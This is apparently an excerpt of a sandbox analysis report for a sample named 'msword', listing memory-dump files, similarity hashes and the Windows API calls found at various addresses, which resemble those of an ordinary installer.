• Associated: 00000010.00000002.2049587628.0000000000408000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000010.00000002.2049618405.000000000040B000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000010.00000002.2049618405.000000000041F000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000010.00000002.2049618405.000000000042B000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000010.00000002.2049618405.0000000000461000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000010.00000002.2049618405.000000000048F000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000010.00000002.2049618405.00000000004B3000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000010.00000002.2049618405.00000000004B7000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000010.00000002.2049618405.00000000004BF000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000010.00000002.2049877101.00000000004F4000.00000002.00000001.01000000.0000000D.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_400000_msword.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 11cd2314bdb72fbaaf254cc8ab9d4ea11bc1da16cf3644787fbca669908488dc
• Instruction ID: 3981f1dd08afc316d24d9ed5113be2a17ca7da729ed8f25fba603efd3ef4d826
• Opcode Fuzzy Hash: 11cd2314bdb72fbaaf254cc8ab9d4ea11bc1da16cf3644787fbca669908488dc
• Instruction Fuzzy Hash: 39815931908248DBEF14CF29C8446AE3BB1FF44355F10812AFC66AB291D778E985DF86
Memory Dump Source
• Source File: 00000010.00000002.2049557691.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000010.00000002.2049529263.0000000000400000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000010.00000002.2049587628.0000000000408000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000010.00000002.2049618405.000000000040B000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000010.00000002.2049618405.000000000041F000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000010.00000002.2049618405.000000000042B000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000010.00000002.2049618405.0000000000461000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000010.00000002.2049618405.000000000048F000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000010.00000002.2049618405.00000000004B3000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000010.00000002.2049618405.00000000004B7000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000010.00000002.2049618405.00000000004BF000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000010.00000002.2049877101.00000000004F4000.00000002.00000001.01000000.0000000D.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_400000_msword.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: f6fc324ba2a3154e694309e6bae2168c7942ffc843c4c16a3e425845c98615c2
• Instruction ID: 01891581271c5a124b16634c3a8992e7a6857e255b4271240234ec945a90a24d
• Opcode Fuzzy Hash: f6fc324ba2a3154e694309e6bae2168c7942ffc843c4c16a3e425845c98615c2
• Instruction Fuzzy Hash: 73713571908248DBEF18CF28C894AAD3BF1FB44355F14812AFC56AB291D738E985DF85
Memory Dump Source
• Source File: 00000010.00000002.2049557691.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000010.00000002.2049529263.0000000000400000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000010.00000002.2049587628.0000000000408000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000010.00000002.2049618405.000000000040B000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000010.00000002.2049618405.000000000041F000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000010.00000002.2049618405.000000000042B000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000010.00000002.2049618405.0000000000461000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000010.00000002.2049618405.000000000048F000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000010.00000002.2049618405.00000000004B3000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000010.00000002.2049618405.00000000004B7000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000010.00000002.2049618405.00000000004BF000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000010.00000002.2049877101.00000000004F4000.00000002.00000001.01000000.0000000D.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_400000_msword.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 50afaaeaa81713190e6368922b68e72c74c0f8af07b8473edddf34e42917c2b6
• Instruction ID: 94e3b44a92ae0aa4503ed5f8848dd13d39bc4d5c5e61625994f203468061122b
• Opcode Fuzzy Hash: 50afaaeaa81713190e6368922b68e72c74c0f8af07b8473edddf34e42917c2b6
• Instruction Fuzzy Hash: 25713671908248DBEF18CF19C894BA93BF1FB44345F10812AFC56AA291C738E985DF86
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_400000_msword.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: c1e8f36220be8f98feef1199d10cba6751babd433578914259dc57061f930aad
• Instruction ID: 61f7b93237898aea062553d5d4b8719da8ac7eccb5076a10c91df3859b53dd49
• Opcode Fuzzy Hash: c1e8f36220be8f98feef1199d10cba6751babd433578914259dc57061f930aad
• Instruction Fuzzy Hash: 98612771908248DBEF18CF19C894BAD3BF1FB44345F14812AFC56AA291C738E985DF86
APIs
• GlobalFree.KERNELBASE(?), ref: 004073C5
• GlobalAlloc.KERNELBASE(00000040,?,00000000,0041F150,00004000), ref: 004073CE
• GlobalFree.KERNELBASE(?), ref: 0040743D
• GlobalAlloc.KERNELBASE(00000040,?,00000000,0041F150,00004000), ref: 00407448
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_400000_msword.jbxd
Similarity
• API ID: Global$AllocFree
• String ID:
• API String ID: 3394109436-0
• Opcode ID: b4e0c1391c46ae50f73649b3c762cd7b27ce57b462bacfc2a9e8da119b19f928
• Instruction ID: da36524f31269fd1e9de8fc6705d7123eeae9c681c0d19372ba3dadca10d6d3f
• Opcode Fuzzy Hash: b4e0c1391c46ae50f73649b3c762cd7b27ce57b462bacfc2a9e8da119b19f928
• Instruction Fuzzy Hash: 81513871918248EBEF18CF19C894AAD3BF1FF44345F10812AFC56AA291C738E985DF85
APIs
• MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013F6
• SendMessageW.USER32(00000402,00000402,00000000), ref: 00401406
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_400000_msword.jbxd
Similarity
• API ID: MessageSend
• String ID:
• API String ID: 3850602802-0
• Opcode ID: 5a31974c6ff286c329462761e498969acf5a6972bf7682297af78da516706e42
• Instruction ID: d71d45502f518029c3ce7990b7c8d381ac94a1bb539c673c2af025244294d997
• Opcode Fuzzy Hash: 5a31974c6ff286c329462761e498969acf5a6972bf7682297af78da516706e42
• Instruction Fuzzy Hash: 96F0F471A10220DFD7555B74DD04B273699AB80361F24463BF911F62F1E6B8DC528B4E
APIs
• GetFileAttributesW.KERNELBASE(00000003,004035C7,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00405E54
• CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A47,?), ref: 00405E76
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_400000_msword.jbxd
Similarity
• API ID: File$AttributesCreate
• String ID:
• API String ID: 415043291-0
• Opcode ID: 6f817a4f04f8c8cc68f88398dd52813d28edb2112aa12cde00d29204b34f1fbe
• Instruction ID: fe2e31f24f36ecb58ba6038de6e4569557e5a61990f2f31681ab57118d472e11
• Opcode Fuzzy Hash: 6f817a4f04f8c8cc68f88398dd52813d28edb2112aa12cde00d29204b34f1fbe
• Instruction Fuzzy Hash: BCD09E71554202EFEF098F60DE1AF6EBBA2FB94B00F11852CB292550F0DAB25819DB15
APIs
• GetFileAttributesW.KERNELBASE(?,00406E81,?,?,?), ref: 00405E34
• SetFileAttributesW.KERNEL32(?,00000000), ref: 00405E47
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_400000_msword.jbxd
Similarity
• API ID: AttributesFile
• String ID:
• API String ID: 3188754299-0
• Opcode ID: 404706a0ec70c465fc6e77d3f379a59e81a865ab84cdc077efcd7274a0164b66
• Instruction ID: a99f375bd2b1051765f890e1d94d2f722c1bb1ba0a12d38356d8610c0186b9c0
• Opcode Fuzzy Hash: 404706a0ec70c465fc6e77d3f379a59e81a865ab84cdc077efcd7274a0164b66
• Instruction Fuzzy Hash: 84C01272404800EAC6000B34DF0881A7B62AB90330B268B39B0BAE00F0CB3488A99A18
APIs
• ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,004033CE,000000FF,00000004,00000000,00000000,00000000), ref: 0040334D
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_400000_msword.jbxd
Similarity
• API ID: FileRead
• String ID:
• API String ID: 2738559852-0
• Opcode ID: 1a43d381f500bc8dc9f00bbbc079669c25ab728c1eaf5fecfa5fd6a2526f4c39
• Instruction ID: a3bc5d39330dd194e4c7332763fdc94ca13499671d705f1c19c6925397c50364
• Opcode Fuzzy Hash: 1a43d381f500bc8dc9f00bbbc079669c25ab728c1eaf5fecfa5fd6a2526f4c39
• Instruction Fuzzy Hash: C8E08C32550118BFCB109EA69C40EE73B5CFB047A2F00C832BD55E5290DA30DA00EBE8
APIs
  • Part of subcall function 00406038: CharNextW.USER32(?,*?|<>/":,00000000,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 0040609B
  • Part of subcall function 00406038: CharNextW.USER32(?,?,?,00000000), ref: 004060AA
  • Part of subcall function 00406038: CharNextW.USER32(?,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060AF
  • Part of subcall function 00406038: CharPrevW.USER32(?,?,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060C3
• CreateDirectoryW.KERNELBASE(004D70C8,00000000,004D70C8,004D70C8,004D70C8,-00000002,00403A0B), ref: 004037ED
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_16_2_400000_msword.jbxd
                                                                                        Similarity
                                                                                        • API ID: Char$Next$CreateDirectoryPrev
                                                                                        • String ID:
                                                                                        • API String ID: 4115351271-0
                                                                                        • Opcode ID: df63d9f6fb0dfe925f434423aee030f478bab57ed52ac2db2f8962d9fd449c2e
                                                                                        • Instruction ID: 8ea1286759415c6f695425ed34242866ebe8a7a529327a4e56f2759b30593fc1
                                                                                        • Opcode Fuzzy Hash: df63d9f6fb0dfe925f434423aee030f478bab57ed52ac2db2f8962d9fd449c2e
                                                                                        • Instruction Fuzzy Hash: B1D0A921083C3221C562332A3D06FCF090C8F2635AB02C07BF841B61CA8B2C4B8240EE
                                                                                        APIs
                                                                                        • SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DC1
                                                                                        Similarity
                                                                                        • API ID: MessageSend
                                                                                        • String ID:
                                                                                        • API String ID: 3850602802-0
                                                                                        • Opcode ID: 203c4a4104ade6b46efc04414fb016ca35add41c2a64233918ece76cb1940256
                                                                                        • Instruction ID: 301fa2329b67e93c742f3c195cb428e9759bf169fd062939fd541a9b7e119014
                                                                                        • Opcode Fuzzy Hash: 203c4a4104ade6b46efc04414fb016ca35add41c2a64233918ece76cb1940256
                                                                                        • Instruction Fuzzy Hash: D3C04C71650601AADA108B509D45F1677595B50B41F544439B641F50E0D674E450DA1E
                                                                                        APIs
                                                                                        • SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040375A,?,?,?,?,00000000,00403A47,?), ref: 00403376
                                                                                        Similarity
                                                                                        • API ID: FilePointer
                                                                                        • String ID:
                                                                                        • API String ID: 973152223-0
                                                                                        • Opcode ID: ff5c9719b5bb24227ed98436e19d1f66b73f6b097333bfca9e4e1763c30da83c
                                                                                        • Instruction ID: da19c3e449f5d10d282cbd9bcc1d8f2f369397d5e390659c1e8fea63e82898b0
                                                                                        • Opcode Fuzzy Hash: ff5c9719b5bb24227ed98436e19d1f66b73f6b097333bfca9e4e1763c30da83c
                                                                                        • Instruction Fuzzy Hash: 0CB09231140204AEDA214B109E05F067A21FB94700F208824B2A0380F086711420EA0C
                                                                                        APIs
                                                                                        • SendMessageW.USER32(00000028,?,00000001,004057B4), ref: 00403DA6
                                                                                        Similarity
                                                                                        • API ID: MessageSend
                                                                                        • String ID:
                                                                                        • API String ID: 3850602802-0
                                                                                        • Opcode ID: 8ef0c84af5b69eb6e5c04aecb335cbd5d798096170d60dc049d97623b8df0028
                                                                                        • Instruction ID: f61ffac979fbda5733e9df3da2bdae5977773398d3d4f9e0d67d11d125479468
                                                                                        • Opcode Fuzzy Hash: 8ef0c84af5b69eb6e5c04aecb335cbd5d798096170d60dc049d97623b8df0028
                                                                                        • Instruction Fuzzy Hash: EFB09235181A00AADE614B00DF0AF457A62A764701F008079B245640B0CAB200E0DB08
                                                                                        APIs
                                                                                        • KiUserCallbackDispatcher.NTDLL(?,0040574D), ref: 00403D8F
                                                                                        Similarity
                                                                                        • API ID: CallbackDispatcherUser
                                                                                        • String ID:
                                                                                        • API String ID: 2492992576-0
                                                                                        • Opcode ID: 7b5b3f07ec4b69a7f183f6b544b36b38adf2938630adbd4e30d083ffe7510c70
                                                                                        • Instruction ID: d14db2bc66c636a64d409f7b36464c270e9f3e97be8c2f7aaa1954d4611ec3db
                                                                                        • Opcode Fuzzy Hash: 7b5b3f07ec4b69a7f183f6b544b36b38adf2938630adbd4e30d083ffe7510c70
                                                                                        • Instruction Fuzzy Hash: 8DA01275005500DBCF014B40EF048067A61B7503007108478F1810003086310420EB08
                                                                                        APIs
                                                                                        • GetDlgItem.USER32(?,000003F9), ref: 00404993
                                                                                        • GetDlgItem.USER32(?,00000408), ref: 004049A0
                                                                                        • GlobalAlloc.KERNEL32(00000040,?), ref: 004049EF
                                                                                        • LoadBitmapW.USER32(0000006E), ref: 00404A02
                                                                                        • SetWindowLongW.USER32(?,000000FC,Function_000048CC), ref: 00404A1C
                                                                                        • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404A2E
                                                                                        • ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 00404A42
                                                                                        • SendMessageW.USER32(?,00001109,00000002), ref: 00404A58
                                                                                        • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404A64
                                                                                        • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404A74
                                                                                        • DeleteObject.GDI32(?), ref: 00404A79
                                                                                        • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404AA4
                                                                                        • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404AB0
                                                                                        • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B51
                                                                                        • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00404B74
                                                                                        • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B85
                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00404BAF
                                                                                        • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404BBE
                                                                                        • ShowWindow.USER32(?,00000005), ref: 00404BCF
                                                                                        • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404CCD
                                                                                        • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404D28
                                                                                        • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404D3D
                                                                                        • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404D61
                                                                                        • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404D87
                                                                                        • ImageList_Destroy.COMCTL32(?), ref: 00404D9C
                                                                                        • GlobalFree.KERNEL32(?), ref: 00404DAC
                                                                                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404E1C
                                                                                        • SendMessageW.USER32(?,00001102,?,?), ref: 00404ECA
                                                                                        • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00404ED9
                                                                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 00404EF9
                                                                                        • ShowWindow.USER32(?,00000000), ref: 00404F49
                                                                                        • GetDlgItem.USER32(?,000003FE), ref: 00404F54
                                                                                        • ShowWindow.USER32(00000000), ref: 00404F5B
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                        • String ID: $ @$M$N
                                                                                        • API String ID: 1638840714-3479655940
                                                                                        • Opcode ID: d31232896a0766ad2925f7f8dcaf29c8f657193e0fe6649208ba40017519f6b3
                                                                                        • Instruction ID: e2b6c32447eba08f07ab18e4c0942225b167af9b9c7e550a0b0592367213937f
                                                                                        • Opcode Fuzzy Hash: d31232896a0766ad2925f7f8dcaf29c8f657193e0fe6649208ba40017519f6b3
                                                                                        • Instruction Fuzzy Hash: 09026CB0900209AFEF209FA4CD45AAE7BB5FB84314F10413AF615B62E1D7B89D91DF58
                                                                                        APIs
                                                                                        • GetDlgItem.USER32(?,000003F0), ref: 004044F9
                                                                                        • IsDlgButtonChecked.USER32(?,000003F0), ref: 00404507
                                                                                        • GetDlgItem.USER32(?,000003FB), ref: 00404527
                                                                                        • GetAsyncKeyState.USER32(00000010), ref: 0040452E
                                                                                        • GetDlgItem.USER32(?,000003F0), ref: 00404543
                                                                                        • ShowWindow.USER32(00000000,00000008,?,00000008,000000E0), ref: 00404554
                                                                                        • SetWindowTextW.USER32(?,?), ref: 00404583
                                                                                        • SHBrowseForFolderW.SHELL32(?), ref: 0040463D
                                                                                        • lstrcmpiW.KERNEL32(00462540,00447240,00000000,?,?), ref: 0040467A
                                                                                        • lstrcatW.KERNEL32(?,00462540), ref: 00404686
                                                                                        • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404696
                                                                                        • CoTaskMemFree.OLE32(00000000), ref: 00404648
                                                                                          • Part of subcall function 00405C84: GetDlgItemTextW.USER32(00000001,00000001,00002004,00403F81), ref: 00405C97
                                                                                          • Part of subcall function 00406038: CharNextW.USER32(?,*?|<>/":,00000000,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 0040609B
                                                                                          • Part of subcall function 00406038: CharNextW.USER32(?,?,?,00000000), ref: 004060AA
                                                                                          • Part of subcall function 00406038: CharNextW.USER32(?,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060AF
                                                                                          • Part of subcall function 00406038: CharPrevW.USER32(?,?,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060C3
                                                                                          • Part of subcall function 00403E74: lstrcatW.KERNEL32(00000000,00000000,0046A560,004C70A8,install.log,00405A9C,004C70A8,004C70A8,004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000,00000006), ref: 00403E8F
                                                                                        • GetDiskFreeSpaceW.KERNEL32(00443238,?,?,0000040F,?,00443238,00443238,?,00000000,00443238,?,?,000003FB,?), ref: 00404759
                                                                                        • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404774
                                                                                          • Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                                                                        • SetDlgItemTextW.USER32(00000000,00000400,00409264), ref: 004047ED
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000010.00000002.2049557691.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                         • Associated: 00000010.00000002.2049529263.0000000000400000.00000002.00000001.01000000.0000000D.sdmp
                                                                                         • Associated: 00000010.00000002.2049587628.0000000000408000.00000002.00000001.01000000.0000000D.sdmp
                                                                                         • Associated: 00000010.00000002.2049618405.000000000040B000.00000004.00000001.01000000.0000000D.sdmp
                                                                                         • Associated: 00000010.00000002.2049618405.000000000041F000.00000004.00000001.01000000.0000000D.sdmp
                                                                                         • Associated: 00000010.00000002.2049618405.000000000042B000.00000004.00000001.01000000.0000000D.sdmp
                                                                                         • Associated: 00000010.00000002.2049618405.0000000000461000.00000004.00000001.01000000.0000000D.sdmp
                                                                                         • Associated: 00000010.00000002.2049618405.000000000048F000.00000004.00000001.01000000.0000000D.sdmp
                                                                                         • Associated: 00000010.00000002.2049618405.00000000004B3000.00000004.00000001.01000000.0000000D.sdmp
                                                                                         • Associated: 00000010.00000002.2049618405.00000000004B7000.00000004.00000001.01000000.0000000D.sdmp
                                                                                         • Associated: 00000010.00000002.2049618405.00000000004BF000.00000004.00000001.01000000.0000000D.sdmp
                                                                                         • Associated: 00000010.00000002.2049877101.00000000004F4000.00000002.00000001.01000000.0000000D.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_16_2_400000_msword.jbxd
                                                                                        Similarity
                                                                                        • API ID: Item$CharText$Next$FreeWindowlstrcat$AsyncBrowseButtonCheckedDiskFolderPrevShowSpaceStateTaskVersionlstrcmpi
                                                                                        • String ID: 82D$@%F$@rD$A
                                                                                        • API String ID: 3347642858-1086125096
                                                                                        • Opcode ID: c0e02fddfd6f2336b8cee43e087a4f5cb21d7496477502da2ed1e77ce6b2ef00
                                                                                        • Instruction ID: 5c5d6a603380bcdbc7d7d35b60f5621b43697e5e98684918e033f9398a36e476
                                                                                        • Opcode Fuzzy Hash: c0e02fddfd6f2336b8cee43e087a4f5cb21d7496477502da2ed1e77ce6b2ef00
                                                                                        • Instruction Fuzzy Hash: D1B1A4B1900209BBDB11AFA1CD85AAF7AB8EF45314F10847BF605B72D1D77C8A41CB59
                                                                                        APIs
                                                                                        • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406EF6
                                                                                        • ReadFile.KERNEL32(00000000,?,0000000C,?,00000000), ref: 00406F30
                                                                                        • ReadFile.KERNEL32(?,?,00000010,?,00000000), ref: 00406FA9
                                                                                        • lstrcpynA.KERNEL32(?,?,00000005), ref: 00406FB5
                                                                                        • lstrcmpA.KERNEL32(name,?), ref: 00406FC7
                                                                                        • CloseHandle.KERNEL32(?), ref: 004071E6
                                                                                          • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                          • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000010.00000002.2049557691.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                         • Associated: 00000010.00000002.2049529263.0000000000400000.00000002.00000001.01000000.0000000D.sdmp
                                                                                         • Associated: 00000010.00000002.2049587628.0000000000408000.00000002.00000001.01000000.0000000D.sdmp
                                                                                         • Associated: 00000010.00000002.2049618405.000000000040B000.00000004.00000001.01000000.0000000D.sdmp
                                                                                         • Associated: 00000010.00000002.2049618405.000000000041F000.00000004.00000001.01000000.0000000D.sdmp
                                                                                         • Associated: 00000010.00000002.2049618405.000000000042B000.00000004.00000001.01000000.0000000D.sdmp
                                                                                         • Associated: 00000010.00000002.2049618405.0000000000461000.00000004.00000001.01000000.0000000D.sdmp
                                                                                         • Associated: 00000010.00000002.2049618405.000000000048F000.00000004.00000001.01000000.0000000D.sdmp
                                                                                         • Associated: 00000010.00000002.2049618405.00000000004B3000.00000004.00000001.01000000.0000000D.sdmp
                                                                                         • Associated: 00000010.00000002.2049618405.00000000004B7000.00000004.00000001.01000000.0000000D.sdmp
                                                                                         • Associated: 00000010.00000002.2049618405.00000000004BF000.00000004.00000001.01000000.0000000D.sdmp
                                                                                         • Associated: 00000010.00000002.2049877101.00000000004F4000.00000002.00000001.01000000.0000000D.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_16_2_400000_msword.jbxd
                                                                                        Similarity
                                                                                        • API ID: File$Read$CloseCreateHandlelstrcmplstrcpynlstrlenwvsprintf
                                                                                        • String ID: %s: failed opening file "%s"$GetTTFNameString$name
                                                                                        • API String ID: 1916479912-1189179171
                                                                                        • Opcode ID: c1ee4f9d51a5711eefddbfc324bacbf89cb8dd321db642bada23a62a27e44b0a
                                                                                        • Instruction ID: 34713ba181b26839f7619e948cf229fd8716e5ee99c03f3e8673f79b0d3e70cf
                                                                                        • Opcode Fuzzy Hash: c1ee4f9d51a5711eefddbfc324bacbf89cb8dd321db642bada23a62a27e44b0a
                                                                                        • Instruction Fuzzy Hash: 9091BF70D1412DAACF04EBA5DD909FEBBBAEF48301F00416AF592F72D0E6785A05DB64
                                                                                        APIs
                                                                                        • DeleteFileW.KERNEL32(?,?,004C30A0), ref: 00406CB8
                                                                                        • lstrcatW.KERNEL32(0045C918,\*.*,0045C918,?,-00000002,004D70C8,?,004C30A0), ref: 00406D09
                                                                                        • lstrcatW.KERNEL32(?,00408838,?,0045C918,?,-00000002,004D70C8,?,004C30A0), ref: 00406D29
                                                                                        • lstrlenW.KERNEL32(?), ref: 00406D2C
                                                                                        • FindFirstFileW.KERNEL32(0045C918,?), ref: 00406D40
                                                                                        • FindNextFileW.KERNEL32(?,00000010,000000F2,?), ref: 00406E22
                                                                                        • FindClose.KERNEL32(?), ref: 00406E33
                                                                                        Strings
                                                                                        • Delete: DeleteFile failed("%s"), xrefs: 00406DFD
                                                                                        • RMDir: RemoveDirectory failed("%s"), xrefs: 00406EB0
                                                                                        • Delete: DeleteFile on Reboot("%s"), xrefs: 00406DE0
                                                                                        • Delete: DeleteFile("%s"), xrefs: 00406DBC
                                                                                        • \*.*, xrefs: 00406D03
                                                                                        • RMDir: RemoveDirectory on Reboot("%s"), xrefs: 00406E93
                                                                                        • RMDir: RemoveDirectory("%s"), xrefs: 00406E6F
                                                                                        • RMDir: RemoveDirectory invalid input("%s"), xrefs: 00406E58
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000010.00000002.2049557691.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                         • Associated: 00000010.00000002.2049529263.0000000000400000.00000002.00000001.01000000.0000000D.sdmp
                                                                                         • Associated: 00000010.00000002.2049587628.0000000000408000.00000002.00000001.01000000.0000000D.sdmp
                                                                                         • Associated: 00000010.00000002.2049618405.000000000040B000.00000004.00000001.01000000.0000000D.sdmp
                                                                                         • Associated: 00000010.00000002.2049618405.000000000041F000.00000004.00000001.01000000.0000000D.sdmp
                                                                                         • Associated: 00000010.00000002.2049618405.000000000042B000.00000004.00000001.01000000.0000000D.sdmp
                                                                                         • Associated: 00000010.00000002.2049618405.0000000000461000.00000004.00000001.01000000.0000000D.sdmp
                                                                                         • Associated: 00000010.00000002.2049618405.000000000048F000.00000004.00000001.01000000.0000000D.sdmp
                                                                                         • Associated: 00000010.00000002.2049618405.00000000004B3000.00000004.00000001.01000000.0000000D.sdmp
                                                                                         • Associated: 00000010.00000002.2049618405.00000000004B7000.00000004.00000001.01000000.0000000D.sdmp
                                                                                         • Associated: 00000010.00000002.2049618405.00000000004BF000.00000004.00000001.01000000.0000000D.sdmp
                                                                                         • Associated: 00000010.00000002.2049877101.00000000004F4000.00000002.00000001.01000000.0000000D.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_16_2_400000_msword.jbxd
                                                                                        Similarity
                                                                                        • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                        • String ID: Delete: DeleteFile failed("%s")$Delete: DeleteFile on Reboot("%s")$Delete: DeleteFile("%s")$RMDir: RemoveDirectory failed("%s")$RMDir: RemoveDirectory invalid input("%s")$RMDir: RemoveDirectory on Reboot("%s")$RMDir: RemoveDirectory("%s")$\*.*
                                                                                        • API String ID: 2035342205-3294556389
                                                                                        • Opcode ID: 15be8897d6e9b53d01f132332000c29bcd26e475d5c6b9324dd4f7514e94a53d
                                                                                        • Instruction ID: 0ca3ec5a28b3c1cae8259a28e21d86b18febecd5c0179aed135e39ed79665852
                                                                                        • Opcode Fuzzy Hash: 15be8897d6e9b53d01f132332000c29bcd26e475d5c6b9324dd4f7514e94a53d
                                                                                        • Instruction Fuzzy Hash: 2D51E3315043056ADB20AB61CD46EAF37B89F81725F22803FF943751D2DB7C49A2DAAD
                                                                                        APIs
                                                                                        • CoCreateInstance.OLE32(00409B24,?,00000001,00409B04,?), ref: 0040257E
                                                                                        Strings
                                                                                        • CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d, xrefs: 00402560
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000010.00000002.2049557691.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                         • Associated: 00000010.00000002.2049529263.0000000000400000.00000002.00000001.01000000.0000000D.sdmp
                                                                                         • Associated: 00000010.00000002.2049587628.0000000000408000.00000002.00000001.01000000.0000000D.sdmp
                                                                                         • Associated: 00000010.00000002.2049618405.000000000040B000.00000004.00000001.01000000.0000000D.sdmp
                                                                                         • Associated: 00000010.00000002.2049618405.000000000041F000.00000004.00000001.01000000.0000000D.sdmp
                                                                                         • Associated: 00000010.00000002.2049618405.000000000042B000.00000004.00000001.01000000.0000000D.sdmp
                                                                                         • Associated: 00000010.00000002.2049618405.0000000000461000.00000004.00000001.01000000.0000000D.sdmp
